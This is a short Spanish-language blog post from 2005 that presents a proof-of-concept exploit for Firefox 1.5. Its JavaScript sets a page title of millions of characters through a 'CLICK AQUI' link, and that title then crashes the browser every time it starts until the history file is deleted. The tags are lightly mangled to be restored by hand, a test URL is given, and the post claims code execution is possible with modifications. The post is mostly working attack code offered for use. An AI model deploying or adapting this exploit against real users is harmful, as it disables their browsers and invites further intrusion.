ecoestadistica.com

miércoles, diciembre 07, 2005

Firefox 1.5 buffer overflow

Básicamente firefox logea todos los datos de una URL en el archivo de historia.dat, este pequeño
script pondrá una data realmente grande y Firefox entonces salvarán esa data en historia.dat. La próxima vez que el firefox se abre,se ¨colgara¨ instantáneamente debido a un buffer overflow -- esto sucederá cada vez, hasta que ustedes borren manualmente el archivo de historia.dat

Esta prueba del concepto solo impide que alguien pueda volver a abrir su browser despues de ejecutar el exploit. En concreto se trataria de Denial Of Service, sin embargo es posible la ejecucion de codigo con algunas modificaciones.

Codigo:
/html/\head/\title/Hola\/title/\script type="text/javascript"/
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
\/script/\/head/\body/MouseHack Dice \a href="javascript:ex();"/CLICK AQUI
\/a/\/body/\/html
Para probar si sos vulnerable:

http://mousehack.noads.info/Fire15.html

Salu2

PD:remplazar las ¨\¨ por ¨<->¨ correspondientes

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com